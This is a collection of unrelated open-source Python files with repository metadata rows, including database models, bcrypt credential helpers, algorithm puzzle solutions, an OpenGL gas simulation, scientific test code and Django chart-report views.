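#   schedule = ScheduleFactory.build()
#   assert schedule.state == 'ENABLED'
#   assert schedule.schedule.interval == 5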
| 26.245098 | 105 | 0.548001 | 2,508 | 0.93687 | 0 | 0 | 0 | 0 | 0 | 0 | 430 | 0.160628 |
5f9164c1cc7e9494a573895e93fd39680b8520f6 | 1,324 | py | Python | ymir/backend/src/ymir_app/app/models/iteration.py | Zhang-SJ930104/ymir | dd6481be6f229ade4cf8fba64ef44a15357430c4 | [
"Apache-2.0"
] | null | null | null | ymir/backend/src/ymir_app/app/models/iteration.py | Zhang-SJ930104/ymir | dd6481be6f229ade4cf8fba64ef44a15357430c4 | [
"Apache-2.0"
] | 1 | 2022-01-18T09:28:29.000Z | 2022-01-18T09:28:29.000Z | ymir/backend/src/ymir_app/app/models/iteration.py | Aryalfrat/ymir | d4617ed00ef67a77ab4e1944763f608bface4be6 | [
"Apache-2.0"
] | null | null | null | from datetime import datetime
from sqlalchemy import Boolean, Column, DateTime, Integer, SmallInteger, String
from app.config import settings
from app.db.base_class import Base
from app.models.task import Task # noqa
class Iteration(Base):
__tablename__ = "iteration"
id = Column(Integer, primary_key=True, index=True, autoincrement=True)
description = Column(String(settings.STRING_LEN_LIMIT))
iteration_round = Column(Integer, index=True, nullable=False)
current_stage = Column(SmallInteger, index=True, default=0, nullable=False)
previous_iteration = Column(Integer, index=True, default=0, nullable=False)
mining_input_dataset_id = Column(Integer)
mining_output_dataset_id = Column(Integer)
label_output_dataset_id = Column(Integer)
training_input_dataset_id = Column(Integer)
training_output_model_id = Column(Integer)
testing_dataset_id = Column(Integer)
user_id = Column(Integer, index=True, nullable=False)
project_id = Column(Integer, index=True, nullable=False)
is_deleted = Column(Boolean, default=False, nullable=False)
create_datetime = Column(DateTime, default=datetime.utcnow, nullable=False)
update_datetime = Column(
DateTime,
default=datetime.utcnow,
onupdate=datetime.utcnow,
nullable=False,
)
| 36.777778 | 79 | 0.749245 | 1,101 | 0.831571 | 0 | 0 | 0 | 0 | 0 | 0 | 17 | 0.01284 |
5f92da5358e075a34f655feb29ca353ec1f92807 | 2,833 | py | Python | src/jenova/components/common.py | inova-tecnologias/jenova | c975f0894b8663c6a9c9fdc7fa33590a219a6ad3 | [
"Apache-2.0"
] | 2 | 2016-08-10T15:08:47.000Z | 2016-10-25T14:27:51.000Z | src/jenova/components/common.py | inova-tecnologias/jenova | c975f0894b8663c6a9c9fdc7fa33590a219a6ad3 | [
"Apache-2.0"
] | 41 | 2016-08-04T20:19:49.000Z | 2017-03-07T20:05:53.000Z | src/jenova/components/common.py | inova-tecnologias/jenova | c975f0894b8663c6a9c9fdc7fa33590a219a6ad3 | [
"Apache-2.0"
] | 3 | 2016-09-26T19:04:51.000Z | 2017-10-26T22:13:45.000Z | import uuid, hashlib, os, yaml, logging.config, json, requests, re
from bcrypt import hashpw, gensalt
from collections import namedtuple
from sqlalchemy import create_engine
from datetime import datetime
CONFIG_FILE = os.environ.get('CONFIG_PATH_FILE')
ZimbraGrant = namedtuple(
'ZimbraGrant', [
'target_name',
'target_type',
'grantee_name',
'grantee_type',
'right',
'deny'
]
)
class CallLogger(object):
@classmethod
def logger(cls):
with open(CONFIG_FILE) as f:
logger_config = yaml.load(f)
logging.config.dictConfig(logger_config['logger'])
return logging.getLogger(os.environ.get('HOSTNAME'))
logger = CallLogger.logger()
class Config(object):
@classmethod
def load(cls):
with open(CONFIG_FILE) as f:
main_config = yaml.load(f)
return main_config
@classmethod
def gen_zimbra_grants(cls, zgrants, target_name, target_dlist, grantee_type='grp'):
"""
:param grantee_type: usr|grp|egp|all|dom|edom|gst|key|pub|email
"""
result_grants = []
for zgrant in zgrants:
result_grants.append(
ZimbraGrant(
target_name = target_name,
target_type = 'domain',
grantee_name = target_dlist,
grantee_type = grantee_type,
right = zgrant,
deny = 0
)
)
return result_grants
class InvalidCredentials(Exception):
status_code = 400
def __init__(self, message, status_code=None):
Exception.__init__(self)
self.msg = message
self.status_code = status_code
class Security(object):
def __init__(self, auth, authtoken, apikey, secretkey):
self.auth = auth
self.authtoken = authtoken
self.apikey = apikey
self.secretkey = secretkey
  def is_valid_credentials(self):
    if self.authtoken and self.is_valid_token():
      return True
    elif self.apikey and self.secretkey:
      if not self.is_valid_secret_key():
        raise InvalidCredentials('Wrong credentials!', 401)
      # Valid API key/secret pair; without this return the method
      # would fall through and implicitly return None.
      return True
    else:
      return False
def is_valid_token(self):
return False
def is_valid_secret_key(self):
return self.check_password(self.auth.secret_key, self.secretkey)
@classmethod
def gen_secret_key(cls, password):
plain_secretkey = hashpw(password, gensalt(log_rounds=13)).split('13$')[1]
hashed_secretkey = hashpw(plain_secretkey, gensalt(log_rounds=13))
return plain_secretkey, hashed_secretkey
@classmethod
def hash_password(cls, password):
return hashpw(password, gensalt(log_rounds=13))
@classmethod
def check_password(cls, hashed_password, user_password):
return hashpw(user_password, hashed_password) == hashed_password
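  # Illustrative round trip (not part of the original class): the plain key
  # is shown to the client once, only the bcrypt hash is stored server-side.
  #
  #   plain, hashed = Security.gen_secret_key('changeme')
  #   assert Security.check_password(hashed, plain)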
@classmethod
def get_jwt_skey(self):
if os.environ.get('NODE_ENV') == 'development':
return 'changeme'
return os.environ.get('JWT_SECRET_KEY') | 26.726415 | 85 | 0.693611 | 2,382 | 0.840805 | 0 | 0 | 1,497 | 0.528415 | 0 | 0 | 282 | 0.099541 |
5f9463815346a08c07f5a3a2ec02e760f4e9de1f | 3,569 | py | Python | hbutils/binary/base.py | HansBug/hbutils | 6872311c8a441c5955572e0093b10189a2b90708 | [
"Apache-2.0"
] | null | null | null | hbutils/binary/base.py | HansBug/hbutils | 6872311c8a441c5955572e0093b10189a2b90708 | [
"Apache-2.0"
] | 25 | 2021-10-03T06:19:05.000Z | 2022-03-27T12:48:57.000Z | hbutils/binary/base.py | HansBug/hbutils | 6872311c8a441c5955572e0093b10189a2b90708 | [
"Apache-2.0"
] | null | null | null | import struct
from typing import BinaryIO
class CIOType:
"""
Overview:
Basic IO type.
Used as base class of all the IO types.
"""
def read(self, file: BinaryIO):
"""
Read from binary IO object.
:param file: Binary file, ``io.BytesIO`` is supported as well.
:return: Reading result.
.. warning::
Need to be implemented.
"""
raise NotImplementedError # pragma: no cover
def write(self, file: BinaryIO, val):
"""
Write object to binary IO object.
:param file: Binary file, ``io.BytesIO`` is supported as well.
:param val: Object to write.
.. warning::
Need to be implemented.
"""
raise NotImplementedError # pragma: no cover
class CFixedType(CIOType):
"""
Overview:
Type with fixed size (such as ``int``, ``uint`` and ``float``).
"""
def __init__(self, size: int):
"""
Constructor of :class:`CFixedType`.
:param size: Size of the type.
"""
self.__size = size
@property
def size(self) -> int:
"""
Size of the given type.
"""
return self.__size
def read(self, file: BinaryIO):
raise NotImplementedError # pragma: no cover
def write(self, file: BinaryIO, val):
raise NotImplementedError # pragma: no cover
class CRangedIntType(CFixedType):
"""
Overview:
Type with fixed size and range (such as ``int`` and ``uint``).
"""
def __init__(self, size: int, minimum: int, maximum: int):
"""
Constructor of :class:`CRangedIntType`.
:param size: Size of the type.
:param minimum: Min value of the type.
:param maximum: Max value of the type.
"""
CFixedType.__init__(self, size)
self.__size = size
self.__minimum = minimum
self.__maximum = maximum
@property
def minimum(self) -> int:
"""
Min value of the type.
"""
return self.__minimum
@property
def maximum(self) -> int:
"""
Max value of the type.
"""
return self.__maximum
def read(self, file: BinaryIO):
raise NotImplementedError # pragma: no cover
def write(self, file: BinaryIO, val):
raise NotImplementedError # pragma: no cover
class CMarkedType(CFixedType):
"""
Overview:
Type with struct mark, which can be directly read by ``struct`` module.
"""
def __init__(self, mark: str, size: int):
"""
Constructor of :class:`CMarkedType`.
:param mark: Mark of the type.
:param size: Size of the type.
"""
CFixedType.__init__(self, size)
self.__mark = mark
@property
def mark(self) -> str:
"""
Mark of the type, will be used to read from binary data with ``struct`` module.
"""
return self.__mark
def read(self, file: BinaryIO):
"""
Read from binary with ``struct`` module.
:param file: Binary file, ``io.BytesIO`` is supported as well.
:return: Result value.
"""
r, = struct.unpack(self.mark, file.read(self.size))
return r
def write(self, file: BinaryIO, val):
"""
Write value to binary IO with ``struct`` module.
:param file: Binary file, ``io.BytesIO`` is supported as well.
:param val: Writing value.
"""
file.write(struct.pack(self.mark, float(val)))
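# Illustrative round trip (not part of the library): '<f' is assumed here as
# the struct mark for a 4-byte little-endian float.
#
#   import io
#   f32 = CMarkedType('<f', 4)
#   buf = io.BytesIO()
#   f32.write(buf, 1.5)
#   buf.seek(0)
#   assert f32.read(buf) == 1.5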
| 24.445205 | 87 | 0.55842 | 3,515 | 0.98487 | 0 | 0 | 542 | 0.151863 | 0 | 0 | 1,963 | 0.550014 |
5f94b482c019a016c621810412b2112d18748236 | 958 | py | Python | Rosalind/iprb.py | yuriyshapovalov/Prototypes | 1fc4af4434440a8f59a4bcb486e79fd53d199a7d | [
"Apache-2.0"
] | null | null | null | Rosalind/iprb.py | yuriyshapovalov/Prototypes | 1fc4af4434440a8f59a4bcb486e79fd53d199a7d | [
"Apache-2.0"
] | 1 | 2015-03-25T22:35:52.000Z | 2015-03-25T22:35:52.000Z | Rosalind/iprb.py | yuriyshapovalov/Prototypes | 1fc4af4434440a8f59a4bcb486e79fd53d199a7d | [
"Apache-2.0"
] | null | null | null | # Mendel's First Law
# http://rosalind.info/problems/iprb/
import sys
import unittest
class iprb:
def main(self, hom_dom, het, hom_rec):
total = hom_dom + het + hom_rec
p_hom_dom = hom_dom / total
p_het = het / total
p_hom_rec = hom_rec / total
prob = 1
prob -= p_hom_rec * ((hom_rec-1)/(total-1))
prob -= 2 * p_hom_rec * (het / (total - 1) * 0.5)
prob -= p_het * ((het - 1) / (total-1)) * 0.25
return prob
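# Worked check (not in the original): for hom_dom = het = hom_rec = 2 the three
# subtracted terms are (2/6)*(1/5), 2*(2/6)*(2/5*0.5) and (2/6)*(1/5)*0.25,
# i.e. 4/60 + 8/60 + 1/60, so prob = 1 - 13/60 = 47/60 ~= 0.78333, matching
# the unit test below.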
class Test(unittest.TestCase):
def setUp(self):
        self.hom_dom = 2
        self.het = 2
        self.hom_rec = 2
        self.result = 0.78333
    def test_mendel_first_law(self):
        self.assertAlmostEqual(
            self.result,
            iprb().main(self.hom_dom, self.het, self.hom_rec),
places=5)
if __name__ == '__main__':
hom_dom = int(sys.argv[1])
het = int(sys.argv[2])
hom_rec = int(sys.argv[3])
if hom_dom == 0 or het == 0 or hom_rec == 0:
raise Exception("ERROR: Incorrect parameters")
result = iprb().main(hom_dom, het, hom_rec)
print(result) | 23.365854 | 51 | 0.654489 | 606 | 0.632568 | 0 | 0 | 0 | 0 | 0 | 0 | 96 | 0.100209 |
5f96125b242a38cf3339aa9cccbeb3af52c0c4f9 | 3,679 | py | Python | boltzmann.py | jkotrc/2D-Elastic-Gas | ee7632518adb03076a684dae48f0fb6f8c44efa3 | [
"Unlicense"
] | null | null | null | boltzmann.py | jkotrc/2D-Elastic-Gas | ee7632518adb03076a684dae48f0fb6f8c44efa3 | [
"Unlicense"
] | null | null | null | boltzmann.py | jkotrc/2D-Elastic-Gas | ee7632518adb03076a684dae48f0fb6f8c44efa3 | [
"Unlicense"
] | null | null | null | #MAIN method and graphics
try:
from OpenGL.GL import *
from OpenGL import GLU
import OpenGL.GL.shaders
except:
print("OpenGL wrapper for python not found")
import glfw
import numpy as np
from computation import Computation
class Graphics:
def __init__(self,width,height, computation):
if not glfw.init():
print("GLFW Failed to initialize!")
self.window = glfw.create_window(width, height, "Boltzmann", None, None);
glfw.make_context_current(self.window)
self.windowsizechanged=False
glfw.set_window_size_callback(self.window, self.resizewindow)
self.program = self.loadShaders("vertex.glsl", "fragment.glsl")
glUseProgram(self.program)
glUniform1i(glGetUniformLocation(self.program, "WIDTH"), width)
glUniform1i(glGetUniformLocation(self.program, "HEIGHT"), height)
self.width=width
self.height=height
        self.comp = computation
self.points = np.array(self.comp.pos.reshape(-1,order='F'), dtype=np.float32)
self.graphicsinit()
def resizewindow(self,w,h,a):
self.windowsizechanged=True
def graphicsinit(self):
VBO = glGenBuffers(1)
glBindBuffer(GL_ARRAY_BUFFER, VBO)
glBufferData(GL_ARRAY_BUFFER, self.points.itemsize * self.points.size, self.points, GL_STATIC_DRAW)
position = glGetAttribLocation(self.program, "position")
glVertexAttribPointer(position, 2, GL_FLOAT, GL_FALSE, 0, None)
glEnableVertexAttribArray(position)
glClearColor(0.3, 0.3, 0.3, 1.0)
glEnable(GL_POINT_SMOOTH)
glPointSize(self.comp.size/2)
def render(self):
for i in range (0, self.comp.frameskip):
self.comp.cudastep();
self.points = self.comp.pos.reshape(-1,order='F')
glClear(GL_COLOR_BUFFER_BIT)
glUseProgram(self.program)
glBufferData(GL_ARRAY_BUFFER, self.points.itemsize * self.points.size, self.points, GL_STATIC_DRAW)
glDrawArrays(GL_POINTS, 0, int(self.points.size / 2))
glfw.swap_buffers(self.window)
def mainloop(self):
while not glfw.window_should_close(self.window):
glfw.poll_events()
if self.windowsizechanged == True:
self.width,self.height = glfw.get_framebuffer_size(self.window);
glUseProgram(self.program)
glUniform1i(glGetUniformLocation(self.program, "WIDTH"), self.width)
glUniform1i(glGetUniformLocation(self.program, "HEIGHT"), self.height)
self.windowsizechanged=False
self.render()
glfw.terminate()
def loadShaders(self, vertpath, fragpath):
vertexshader=glCreateShader(GL_VERTEX_SHADER)
fragmentshader=glCreateShader(GL_FRAGMENT_SHADER)
fragfile = open(fragpath, "r")
vertfile = open(vertpath, "r")
fragsource = fragfile.read()
fragfile.close()
vertsource = vertfile.read()
vertfile.close()
shader = OpenGL.GL.shaders.compileProgram(OpenGL.GL.shaders.compileShader(vertsource, GL_VERTEX_SHADER),
OpenGL.GL.shaders.compileShader(fragsource, GL_FRAGMENT_SHADER))
return shader
if __name__ == "__main__":
#A good configuration: 80x80 balls, space 24, width=height=1000, size=8, speedrange=20, frameskip=3, epsilon=0.01, blocksize=512
comp=Computation(width=1000, height=1000, space=20, xballs=100, yballs=100, speedrange=20,size=4,frameskip=1,epsilon=0.01,blocksize=512)
g=Graphics(1000, 1000,comp)
g.mainloop(); | 44.325301 | 141 | 0.651264 | 3,070 | 0.834466 | 0 | 0 | 0 | 0 | 0 | 0 | 321 | 0.087252 |
5f972ab5ab25213d75c3f56834078dbd2a9d9668 | 706 | py | Python | python/src/day06.py | azuline/aoc2020 | 849b48adf3a67ac0eeb485818e38a4b3a72fc03a | [
"Apache-2.0"
] | 3 | 2020-12-09T11:36:31.000Z | 2020-12-11T01:41:52.000Z | python/src/day06.py | azuline/aoc2020 | 849b48adf3a67ac0eeb485818e38a4b3a72fc03a | [
"Apache-2.0"
] | null | null | null | python/src/day06.py | azuline/aoc2020 | 849b48adf3a67ac0eeb485818e38a4b3a72fc03a | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
from itertools import chain
from pathlib import Path
from typing import List
INPUT_FILE = Path.cwd().parent / "inputs" / "day06.txt"
AnswerGroup = List[str]
def transform_input(input: str) -> List[AnswerGroup]:
return [x.split("\n") for x in input.strip().split("\n\n")]
def part1(groups: List[AnswerGroup]) -> int:
return sum(len(set(chain(*x))) for x in groups)
def part2(groups: List[AnswerGroup]) -> int:
return sum(len(set.intersection(*[set(y) for y in x])) for x in groups)
if __name__ == "__main__":
with INPUT_FILE.open("r") as f:
input = transform_input(f.read())
print(f"Part 1: {part1(input)}")
print(f"Part 2: {part2(input)}")
| 23.533333 | 75 | 0.660057 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 113 | 0.160057 |
5f979d09341797e001c31791e45f05729f30d0c6 | 933 | py | Python | symopt/objective.py | spcornelius/symopt | 6f276ca07cc266af1cd58758a0cf413ab85f2591 | [
"MIT"
] | null | null | null | symopt/objective.py | spcornelius/symopt | 6f276ca07cc266af1cd58758a0cf413ab85f2591 | [
"MIT"
] | null | null | null | symopt/objective.py | spcornelius/symopt | 6f276ca07cc266af1cd58758a0cf413ab85f2591 | [
"MIT"
] | null | null | null | from symopt.base import SymOptExpr
import sympy as sym
class ObjectiveFunction(SymOptExpr):
""" Symbolic (non)linear optimization objective function. """
def __init__(self, obj, prob, **kwargs):
""" Symbolic (non)linear optimization objective function.
Parameters
----------
obj : `~sympy.core.expr.Expr`
Symbolic expression representing the objective function,
in terms of :py:attr:`prob.vars` and :py:attr:`prob.params`.
prob : `.OptimizationProblem`
The containing optimization problem.
**kwargs
Keyword args to pass to `.SymOptBase`.
"""
self.obj = sym.sympify(obj)
super().__init__(prob, **kwargs)
@property
def expr(self):
return self.obj
@property
def sympified(self):
return self.obj
def __repr__(self):
return f"ObjectiveFunction('{self.obj}')"
| 27.441176 | 72 | 0.608789 | 875 | 0.937835 | 0 | 0 | 111 | 0.118971 | 0 | 0 | 538 | 0.576635 |
5f97f0b8c3e75f1f6f491e876381487088f22f49 | 771 | py | Python | batch_run.py | hrishioa/Oyente | 76c8943426727c93ab161a4e196dc6abdf636fe2 | [
"MIT"
] | 4 | 2017-01-25T05:25:52.000Z | 2021-02-18T08:48:51.000Z | batch_run.py | hrishioa/Oyente | 76c8943426727c93ab161a4e196dc6abdf636fe2 | [
"MIT"
] | null | null | null | batch_run.py | hrishioa/Oyente | 76c8943426727c93ab161a4e196dc6abdf636fe2 | [
"MIT"
] | 1 | 2018-08-09T20:57:31.000Z | 2018-08-09T20:57:31.000Z | import json
import glob
from tqdm import tqdm
import os
contract_dir = 'contract_data'
cfiles = glob.glob(contract_dir+'/contract*.json')
cjson = {}
print "Loading contracts..."
for cfile in tqdm(cfiles):
cjson.update(json.loads(open(cfile).read()))
results = {}
missed = []
print "Running analysis..."
for c in tqdm(cjson):
with open('tmp.evm','w') as of:
# print "Out: "+cjson[c][1][2:]
of.write(cjson[c][1][2:]+"\0")
os.system('python oyente.py tmp.evm -j -b')
try:
results[c] = json.loads(open('tmp.evm.json').read())
except:
missed.append(c)
print "Writing results..."
with open('results.json', 'w') as of:
of.write(json.dumps(results,indent=1))
with open('missed.json', 'w') as of:
of.write(json.dumps(missed,indent=1))
print "Completed." | 19.769231 | 54 | 0.66537 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 233 | 0.302205 |
5f981f7b480688c0f261ed48cbccc55b236c176c | 2,266 | py | Python | tests/test_statistics.py | BENR0/textory | 0f81b8b6726298b9181be27da7aaac2dd25bd763 | [
"MIT"
] | 1 | 2020-07-01T14:40:10.000Z | 2020-07-01T14:40:10.000Z | tests/test_statistics.py | BENR0/textory | 0f81b8b6726298b9181be27da7aaac2dd25bd763 | [
"MIT"
] | 9 | 2020-02-07T11:58:51.000Z | 2021-09-07T16:23:38.000Z | tests/test_statistics.py | BENR0/textory | 0f81b8b6726298b9181be27da7aaac2dd25bd763 | [
"MIT"
] | 1 | 2019-11-20T05:53:13.000Z | 2019-11-20T05:53:13.000Z | #! /usr/bin/python
# -*- coding: utf-8 -*-
import pytest
import numpy as np
from textory.util import neighbour_diff_squared, num_neighbours, neighbour_count, create_kernel
from textory.statistics import variogram, pseudo_cross_variogram
@pytest.fixture
def init_np_arrays():
"""Inits two random np arrays"""
np.random.seed(42)
n = 50
a1 = np.random.random((n,n)) * 157
a2 = np.random.random((n,n)) * 237
return a1.astype(np.float32), a2.astype(np.float32)
def test_variogram(init_np_arrays):
"""THIS TEST ONLY COVERS THE VERSION WITH INEXACT NEIGHBOUR COUNT ON THE EDGES
This test needs improvement in calculation and what is tested.
Much code is shared with the "neighbour_diff_squared" test in test_util.
"""
a, _ = init_np_arrays
tmp = np.zeros_like(a)
lag = 1
lags = range(-lag, lag + 1)
rows, cols = a.shape
#calculate variogram difference
for i in range(0, cols):
for j in range(0, rows):
for l in lags:
for k in lags:
if (i+l < 0) | (i+l >= cols) | (j+k < 0) | (j+k >= rows) | ((l == 0) & (k == 0)):
continue
else:
tmp[i,j] += np.square((a[i, j] - a[i+l, j+k]))
tmp = np.nansum(tmp)
res = tmp / 40000
assert variogram(a, lag=1) == res
def test_pseudo_cross_variogram(init_np_arrays):
"""THIS TEST ONLY COVERS THE VERSION WITH INEXACT NEIGHBOUR COUNT ON THE EDGES
This test needs improvement in calculation and what is tested.
Much code is shared with the "neighbour_diff_squared" test in test_util.
"""
a, b = init_np_arrays
tmp = np.zeros_like(a)
lag = 1
lags = range(-lag, lag + 1)
rows, cols = a.shape
#calculate variogram difference
for i in range(0, cols):
for j in range(0, rows):
for l in lags:
for k in lags:
if (i+l < 0) | (i+l >= cols) | (j+k < 0) | (j+k >= rows) | ((l == 0) & (k == 0)):
continue
else:
tmp[i,j] += np.square((a[i, j] - b[i+l, j+k]))
tmp = np.nansum(tmp)
res = tmp / 40000
assert pseudo_cross_variogram(a, b, lag=1) == res
| 27.634146 | 101 | 0.566637 | 0 | 0 | 0 | 0 | 245 | 0.10812 | 0 | 0 | 595 | 0.262577 |
5f9861c2730925ff3619b6059676dc2a261cbae6 | 827 | py | Python | question_bank/lemonade-change/lemonade-change.py | yatengLG/leetcode-python | 5d48aecb578c86d69835368fad3d9cc21961c226 | [
"Apache-2.0"
] | 9 | 2020-08-12T10:01:00.000Z | 2022-01-05T04:37:48.000Z | question_bank/lemonade-change/lemonade-change.py | yatengLG/leetcode-python | 5d48aecb578c86d69835368fad3d9cc21961c226 | [
"Apache-2.0"
] | 1 | 2021-02-16T10:19:31.000Z | 2021-02-16T10:19:31.000Z | question_bank/lemonade-change/lemonade-change.py | yatengLG/leetcode-python | 5d48aecb578c86d69835368fad3d9cc21961c226 | [
"Apache-2.0"
] | 4 | 2020-08-12T10:13:31.000Z | 2021-11-05T01:26:58.000Z | # -*- coding: utf-8 -*-
# @Author : LG
"""
Runtime: 152 ms, beats 96.83% of all Python3 submissions
Memory: 14 MB, beats 12.45% of all Python3 submissions
Approach:
    see the inline comments
"""
class Solution:
def lemonadeChange(self, bills: List[int]) -> bool:
        five = ten = 0  # start with zero $5 and $10 bills in hand
        for bill in bills:
            if bill == 20:  # a $20 can be changed in two ways
                if five > 0 and ten > 0:  # one $5 plus one $10
                    five -= 1
                    ten -= 1
                elif five > 2:  # or three $5 bills
                    five -= 3
                else:  # otherwise change cannot be made
                    return False
            elif bill == 10 and five > 0:  # a $10 can only be changed with one $5
                five -= 1
                ten += 1
            elif bill == 5:  # a $5 needs no change
five += 1
else:
return False
return True | 27.566667 | 59 | 0.41717 | 768 | 0.764179 | 0 | 0 | 0 | 0 | 0 | 0 | 398 | 0.39602 |
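# Worked check (not in the original): [5, 5, 5, 10, 20] -> True (the 20 is
# changed with one 10 and one 5), while [5, 5, 10, 10, 20] -> False because
# changing the 20 would need a 5 that has already been given out.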
5f98d7e1817b744273f69d626fee4ccb8dd5c371 | 319 | py | Python | pythonProject/MUNDO 2/Desafio 57.py | lucasjlgc/Aulas-de-Python- | 6aaed1c660487a680e9c449210600ccdfa326612 | [
"MIT"
] | null | null | null | pythonProject/MUNDO 2/Desafio 57.py | lucasjlgc/Aulas-de-Python- | 6aaed1c660487a680e9c449210600ccdfa326612 | [
"MIT"
] | 1 | 2021-06-25T15:29:11.000Z | 2021-06-25T15:29:11.000Z | pythonProject/MUNDO 2/Desafio 57.py | lucasjlgc/Aulas-de-Python- | 6aaed1c660487a680e9c449210600ccdfa326612 | [
"MIT"
] | null | null | null | #Leia o sexo de uma pessoa, só aceite as letras M ou F; Caso contrario, peça a digitação novamente
sexo= str(input('Digite seu sexo [M/F]: ')).strip().upper()[0]
while sexo not in 'MF':
sexo=str(input('DIGITE O SEXO [M/F]: ')).strip().upper()[0]
print('seu sexo é {} e está registrado com sucesso!'.format(sexo)) | 39.875 | 98 | 0.670846 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 202 | 0.621538 |
5f993e929da96965b346f667b7d028433a1f27c0 | 2,157 | py | Python | plugins/uma/plugins/uma_whois/__init__.py | liangzimiao/miyubot | c2788712255e39348c8980c8ace2f6f75fb6621c | [
"Apache-2.0"
] | null | null | null | plugins/uma/plugins/uma_whois/__init__.py | liangzimiao/miyubot | c2788712255e39348c8980c8ace2f6f75fb6621c | [
"Apache-2.0"
] | null | null | null | plugins/uma/plugins/uma_whois/__init__.py | liangzimiao/miyubot | c2788712255e39348c8980c8ace2f6f75fb6621c | [
"Apache-2.0"
] | null | null | null | from nonebot.adapters.onebot.v11.event import MessageEvent
from nonebot.typing import T_State
from nonebot.adapters.onebot.v11 import Bot, Message
from plugins.uma.plugins.uma_whois.data_source import UmaWhois
from plugins.uma import chara
#matcher =on_endswith({'是谁','是谁?','是谁?'},priority=5)
matcher =UmaWhois().on_regex(r'^(.*)是谁([?? ])?',"whois")
@matcher.handle()
async def whois(bot: Bot, event: MessageEvent,state: T_State):
name = event.message.extract_plain_text().strip()
name = name.split("是", 1)[0]
print(name)
if not name:
return
id_ = chara.name2id(name)
confi = 100
guess = False
if id_ == chara.UNKNOWN:
id_, guess_name, confi = chara.guess_id(name)
guess = True
c = chara.fromid(id_)
if confi < 60:
return
if guess:
name = name
msg = f'特雷森似乎没有叫"{name}"的人...\n角色别称补全计划:https://github.com/chieri-bot/umamusume-alias'
await matcher.send(Message(msg))
msg = f'您有{confi}%的可能在找{guess_name} {c.icon} {c.name}'
await matcher.send(Message(msg))
else:
msg = f'{c.name}{c.icon}'
await matcher.send(Message(msg), at_sender=True)
#matcher =on_startswith('谁是',priority=5)
matcher =UmaWhois().on_regex(r'^谁是(.*)([?? ])?',"whois")
@matcher.handle()
async def whois(bot: Bot, event: MessageEvent,state: T_State):
name = event.message.extract_plain_text().strip()
name = name.split("是", 1)[1]
name = name.split("?", 1)[0]
name = name.split("?", 1)[0]
print(name)
if not name:
return
id_ = chara.name2id(name)
confi = 100
guess = False
if id_ == chara.UNKNOWN:
id_, guess_name, confi = chara.guess_id(name)
guess = True
c = chara.fromid(id_)
if confi < 60:
return
if guess:
name = name
msg = f'特雷森似乎没有叫"{name}"的人...\n角色别称补全计划:https://github.com/chieri-bot/umamusume-alias'
await matcher.send(Message(msg))
msg = f'您有{confi}%的可能在找{guess_name} {c.icon} {c.name}'
await matcher.send(Message(msg))
else:
msg = f'{c.name}{c.icon}'
await matcher.send(Message(msg), at_sender=True) | 32.19403 | 94 | 0.623551 | 0 | 0 | 0 | 0 | 1,809 | 0.788923 | 1,773 | 0.773223 | 584 | 0.254688 |
5f99e058ef025684556e0579c4ec1d81fb084ff1 | 8,288 | py | Python | analyzer/views.py | jonfang/CMPE295_DataAnalyzer | 6d74f55fa7e38ff8d25aecc388a5ed87c95037ae | [
"MIT"
] | 1 | 2020-10-12T18:17:05.000Z | 2020-10-12T18:17:05.000Z | analyzer/views.py | jonfang/CMPE295_DataAnalyzer | 6d74f55fa7e38ff8d25aecc388a5ed87c95037ae | [
"MIT"
] | 3 | 2019-11-19T20:41:50.000Z | 2021-06-10T21:48:44.000Z | analyzer/views.py | jonfang/CMPE295_DataAnalyzer | 6d74f55fa7e38ff8d25aecc388a5ed87c95037ae | [
"MIT"
] | 2 | 2019-10-30T23:18:57.000Z | 2019-11-23T00:23:17.000Z | from django.http import HttpResponse
from pyspark.sql import SparkSession
from django.shortcuts import render
from datetime import datetime
from core.chartfactory import createBarChart, createPieChart
from core.dataprocessor import DataProcessor
def sample(request):
"""
sample python report
"""
keys = ('Python', 'C++', 'Java', 'Perl', 'Scala', 'Lisp')
values = [10,8,6,4,2,1]
image_base64 = createBarChart(keys, values, 'Usage', 'Programming language usages')
return render(
request,
'analyzer/main.html',
{
'name': "Jon",
'date': datetime.now(),
'image_base64':image_base64,
}
)
def home(request):
return render(
request,
'analyzer/home.html',
)
def submit(request):
data = {}
if request.method == 'POST':
keys = []
values = []
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=7)
image_base64 = createBarChart(keys, values, 'Company', 'Average Empoyee Rating')
data = {
"title": request.POST.get("title", "defaultTitle"),
"description": request.POST.get("description", "defaultDescription"),
"news": request.POST.get("news", "defaultNews"),
"dataSet": request.POST.get("dataSet", "defaultDataset"),
"bar": request.POST.get("bar", "defaultBar"),
"pie": request.POST.get("pie", "defaultPie"),
"report1":image_base64
}
return render(
request,
'analyzer/new.html',
data
)
def case1(request):
keys = []
values = []
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=1)
image_base64 = createBarChart(keys, values, 'App Count', 'Google Play App Store Count By Category > 400 ')
keys.clear()
values.clear()
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=2)
config = {'rotation':90}
image_base64_1 = createBarChart(keys, values, 'App Count', 'Google Play App Store Count By Category < 400', configs=config)
return render(
request,
'analyzer/case1.html',
{
'report1':image_base64,
'report2':image_base64_1
}
)
def case2(request):
keys = []
values = []
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=5)
image_base64 = createPieChart(keys, values, 'India trade import 2010-2018')
keys.clear()
values.clear()
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=5)
config = {'rotation':90}
image_base64_1 = createBarChart(keys, values, 'Total(millions $USD)', 'India trade import 2010-2018', configs=config)
keys.clear()
values.clear()
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=6)
image_base64_2 = createPieChart(keys, values, 'India trade export 2010-2018')
keys.clear()
values.clear()
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=6)
config = {'rotation':90}
image_base64_3 = createBarChart(keys, values, 'Total(millions $USD)', 'India trade export 2010-2018', configs=config)
return render(
request,
'analyzer/case2.html',
{
'report5a':image_base64,
'report5b':image_base64_1,
'report6a':image_base64_2,
'report6b':image_base64_3,
}
)
def case3(request):
keys = []
values = []
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=4)
image_base64 = createPieChart(keys, values, 'Oakland Crime Rate 2011-2016')
keys.clear()
values.clear()
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=4)
config = {'rotation':90}
